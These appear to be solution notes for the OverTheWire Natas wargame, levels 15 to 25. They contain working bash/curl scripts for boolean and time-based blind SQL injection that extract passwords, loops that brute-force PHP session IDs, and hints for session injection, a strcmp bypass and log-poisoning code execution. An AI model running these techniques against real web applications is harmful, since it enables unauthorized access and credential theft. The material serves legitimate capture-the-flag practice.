Natas 15
Attempt until the password substring matches
k=''
for v in {{a..z},{A..Z},{0..9}};
do
curl "natas15:$pw@"'http://natas15.natas.labs.overthewire.org/index.php'
--data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25'
--compressed > out 2>/dev/null;
if [ `grep -c 'user exists' out` -gt 0 ];
then k=$k$v; echo $k; break;
fi;
done
Natas 18
Capture Password by introducing a 10 second sleep if the password is correct
#timeout.sh contains:
perl -e 'alarm shift; exec @ARGV' "$@";
Test the duration of the curl command
for z in {0..33};
do
w=0;
for v in {{a..z},{A..Z},{0..9}};
do ./timeout.sh 2 bash -c "curl natas18:$pw@'http://natas17.natas.labs.overthewire.org/index.php'
--data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'$pw$v'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23'
--compressed > out 2>/dev/null" 2>/dev/null;
if [ $? -ne 0 ];
then pw=$pw$v;
echo $pw;
w=1;
fi;
done;
if [ $w -eq 0 ]; then break; fi;
done;
Natas 19
Search for session ID with a different page output
for k in {0..640};
do
curl "natas19:$pw@"'http://natas18.natas.labs.overthewire.org/index.php' -H 'Cookie: PHPSESSID='$k
--compressed > out 2>/dev/null;
if [ `grep regular out | wc -l` -eq 0 ];
then echo $k;
break;
fi;
done
Natas 20
Brute Force for session ID after capturing ~500 new sessions (where username=admin) to determine common cookie elements, starts with 3, ends with 2d61646d696e.
for k in {0..64000};
do
curl "natas20:$pw@"'http://natas19.natas.labs.overthewire.org/index.php?debug=1'
-H 'Cookie: PHPSESSID=3'$k'2d61646d696e' --compressed > out 2>/dev/null;
if [ `grep -E 'regular|username' out | wc -l ` -eq 0 ];
then echo 'found: '$k;
break;
fi;
if [ $((k % 100)) -eq 0 ];
then echo $k;
fi;
done;
Other Hints
21 – Add %0A to trick the sessionwrite
22 – Simply change the form to send admin=1, then use the sessionID in the other site
23 – Ignore the redirect (and get the full webpage via curl)
24 – Break strcmp (make it fail)
25 – Log our php code into the *.log, then have the index.php ‘include’ the php commands we embedded in the log file.